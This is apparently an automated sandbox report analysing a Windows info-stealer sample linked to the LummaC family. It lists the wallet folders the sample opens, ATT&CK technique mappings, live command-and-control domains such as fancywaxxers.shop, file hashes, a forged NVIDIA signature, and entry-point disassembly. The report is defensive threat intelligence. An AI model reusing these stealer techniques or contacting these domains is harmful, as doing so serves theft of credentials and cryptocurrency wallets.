                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: Yara matchFile source: 00000003.00000003.2181607562.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2181670779.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2181421854.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: UhsjR3ZFTD.exe PID: 3960, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: UhsjR3ZFTD.exe PID: 3960, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                211
                Process Injection
                21
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Screen Capture
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                211
                Process Injection
                LSASS Memory241
                Security Software Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager21
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares41
                Data from Local System
                113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS1
                Process Discovery
                Distributed Component Object Model2
                Clipboard Data
                Protocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets11
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials43
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                UhsjR3ZFTD.exe32%ReversingLabs
                UhsjR3ZFTD.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://fancywaxxers.shop/apid100%Avira URL Cloudmalware
                https://fancywaxxers.shop/apiM100%Avira URL Cloudmalware
                https://fancywaxxers.shop:443/apixt.default-release/key4.dbPK100%Avira URL Cloudmalware
                https://fancywaxxers.shop:443/apil100%Avira URL Cloudmalware
                https://fancywaxxers.shop/apiE100%Avira URL Cloudmalware
                https://fancywaxxers.shop:443/apitPK100%Avira URL Cloudmalware
                https://fancywaxxers.shop/9100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                fancywaxxers.shop
                104.21.32.1
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  fancywaxxers.shopfalse
                    high
                    rabidcowse.shopfalse
                      high
                      wholersorie.shopfalse
                        high
                        cloudewahsj.shopfalse
                          high
                          noisycuttej.shopfalse
                            high
                            nearycrepso.shopfalse
                              high
                              https://fancywaxxers.shop/apifalse
                                high
                                framekgirus.shopfalse
                                  high
                                  tirepublicerj.shopfalse
                                    high
                                    abruptyopsn.shopfalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabUhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://fancywaxxers.shop:443/apixt.default-release/key4.dbPKUhsjR3ZFTD.exe, 00000003.00000003.2201305187.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2200589372.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191976803.0000000002E73000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://duckduckgo.com/ac/?q=UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://fancywaxxers.shop/apidUhsjR3ZFTD.exe, 00000003.00000003.2146982186.0000000005450000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://ocsp.entrust.net03UhsjR3ZFTD.exefalse
                                            high
                                            http://ocsp.entrust.net02UhsjR3ZFTD.exefalse
                                              high
                                              https://fancywaxxers.shop/apiMUhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E96000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgUhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://fancywaxxers.shop:443/apilUhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191976803.0000000002E73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://x1.c.lencr.org/0UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://x1.i.lencr.org/0UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchUhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.amazon.com/?tag=admarketus-20&reUhsjR3ZFTD.exe, 00000003.00000003.2191772467.0000000005448000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2170745627.0000000005445000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2169941654.0000000005441000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://crl.entrust.net/ts1ca.crl0UhsjR3ZFTD.exefalse
                                                            high
                                                            https://support.mozilla.org/products/firefoxgro.allUhsjR3ZFTD.exe, 00000003.00000003.2159017711.000000000556B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.mozilla.orUhsjR3ZFTD.exe, 00000003.00000003.2158920512.000000000545D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://fancywaxxers.shop:443/apiUhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoUhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.UhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.entrust.net/rpa03UhsjR3ZFTD.exefalse
                                                                        high
                                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiUhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://aia.entrust.net/ts1-chain256.cer01UhsjR3ZFTD.exefalse
                                                                            high
                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://ocsp.rootca1.amazontrust.com0:UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.ecosia.org/newtab/UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brUhsjR3ZFTD.exe, 00000003.00000003.2159017711.000000000556B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_UhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://fancywaxxers.shop:443/apitPKUhsjR3ZFTD.exe, 00000003.00000003.2181421854.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201305187.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2200589372.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191976803.0000000002E73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        https://ac.ecosia.org/autocomplete?q=UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgUhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://fancywaxxers.shop/apiEUhsjR3ZFTD.exe, 00000003.00000003.2217230257.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201149843.0000000002F06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://fancywaxxers.shop/9UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              unknown
                                                                                              https://fancywaxxers.shop/UhsjR3ZFTD.exe, 00000003.00000003.2192097972.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2217269597.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2217230257.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227208638.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2181347543.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227144209.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E6C000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201149843.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2146982186.0000000005459000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2217324289.0000000002EE7000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2228040812.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191841142.0000000002F06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://crl.entrust.net/2048ca.crl0UhsjR3ZFTD.exefalse
                                                                                                    high
                                                                                                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaUhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.entrust.net/rpa0UhsjR3ZFTD.exefalse
                                                                                                        high
                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs
                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        104.21.32.1
                                                                                                        fancywaxxers.shopUnited States
                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1583096
                                                                                                        Start date and time:2025-01-01 22:04:06 +01:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 3m 16s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Number of analysed new started processes analysed:6
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:UhsjR3ZFTD.exe
                                                                                                        renamed because original name is a hash value
                                                                                                        Original Sample Name:639a67914a8e386632cee14f4694015aa7ae186666173159eb171233364f7620.exe
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@4/0@1/1
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 100%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 97%
                                                                                                        • Number of executed functions: 48
                                                                                                        • Number of non-executed functions: 148
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .exe
                                                                                                        • Stop behavior analysis, all processes terminated
                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                                                                                        • Excluded IPs from analysis (whitelisted): 20.242.39.171, 2.22.50.131, 2.22.50.144, 13.107.246.45, 20.12.23.50
                                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                        • VT rate limit hit for: UhsjR3ZFTD.exe
                                                                                                        TimeTypeDescription
                                                                                                        16:04:56API Interceptor8x Sleep call for process: UhsjR3ZFTD.exe modified
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        104.21.32.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                        • redroomaudio.com/administrator/index.php
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        fancywaxxers.shopLoader.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.48.1
                                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.80.1
                                                                                                        Solara-Roblox-Executor-v3.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.96.1
                                                                                                        Delta.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.96.1
                                                                                                        SMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.48.1
                                                                                                        zhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.112.1
                                                                                                        2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.64.1
                                                                                                        Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                        • 104.21.112.1
                                                                                                        bzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.64.1
                                                                                                        x6VtGfW26X.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.112.1
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        CLOUDFLARENETUS544WP3NHaP.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                        • 172.67.220.198
                                                                                                        KRNL.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.157.254
                                                                                                        01012025.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 104.17.25.14
                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.198.102
                                                                                                        SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.112.1
                                                                                                        test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.21.16
                                                                                                        test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.21.16
                                                                                                        web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                        • 188.114.96.3
                                                                                                        test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.21.16
                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 188.114.97.3
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        a0e9f5d64349fb13191bc781f81f42e1KRNL.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.32.1
                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.32.1
                                                                                                        SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.32.1
                                                                                                        web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.32.1
                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.32.1
                                                                                                        qnUFsmyxMm.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.32.1
                                                                                                        Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.32.1
                                                                                                        yTcaknrrb8.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.32.1
                                                                                                        Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                        • 104.21.32.1
                                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.32.1
                                                                                                        No context
                                                                                                        No created / dropped files found
                                                                                                        File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                        Entropy (8bit):7.82486074666969
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:UhsjR3ZFTD.exe
                                                                                                        File size:835'112 bytes
                                                                                                        MD5:51648584ffb4a6398eb1cef4da20e457
                                                                                                        SHA1:74f2facfc001a0b4f23b8d4ce24208aa0c5f84e2
                                                                                                        SHA256:639a67914a8e386632cee14f4694015aa7ae186666173159eb171233364f7620
                                                                                                        SHA512:c77036be9e73e12b43f02fd48dbe4f49469f0a21baf83bf23d43bb6678a52e4702cacaa05baeb189e10726ce1d5797b67d3bf8f98844632c04913ec3df46acfa
                                                                                                        SSDEEP:24576:5B2uFkvh/nrd8NhhG5idard8NhhG5idct:5B2lneh8eaeh8e0
                                                                                                        TLSH:8905022274D0C072ED63253798F99BBA962EA9510B219CCF47884F6A8F713C19B3475F
                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Bug.................H..........@.............@.......................................@.....................................(..
                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                        Entrypoint:0x40a340
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:true
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows cui
                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                        DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x677542F8 [Wed Jan 1 13:28:24 2025 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:6
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:6
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:6
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:3ccbd572e5c574aa059c8de8b80553b8
                                                                                                        Signature Valid:false
                                                                                                        Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                                                        Error Number:-2146869232
                                                                                                        Not Before, Not After
                                                                                                        • 13/01/2023 01:00:00 17/01/2026 00:59:59
                                                                                                        Subject Chain
                                                                                                        • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                                        Version:3
                                                                                                        Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                                                                        Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                                                                        Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                                                                        Serial:0997C56CAA59055394D9A9CDB8BEEB56
                                                                                                        Instruction
                                                                                                        call 00007EFFBCBFFE9Ah
                                                                                                        jmp 00007EFFBCBFFCFDh
                                                                                                        mov ecx, dword ptr [004307C0h]
                                                                                                        push esi
                                                                                                        push edi
                                                                                                        mov edi, BB40E64Eh
                                                                                                        mov esi, FFFF0000h
                                                                                                        cmp ecx, edi
                                                                                                        je 00007EFFBCBFFE96h
                                                                                                        test esi, ecx
                                                                                                        jne 00007EFFBCBFFEB8h
                                                                                                        call 00007EFFBCBFFEC1h
                                                                                                        mov ecx, eax
                                                                                                        cmp ecx, edi
                                                                                                        jne 00007EFFBCBFFE99h
                                                                                                        mov ecx, BB40E64Fh
                                                                                                        jmp 00007EFFBCBFFEA0h
                                                                                                        test esi, ecx
                                                                                                        jne 00007EFFBCBFFE9Ch
                                                                                                        or eax, 00004711h
                                                                                                        shl eax, 10h
                                                                                                        or ecx, eax
                                                                                                        mov dword ptr [004307C0h], ecx
                                                                                                        not ecx
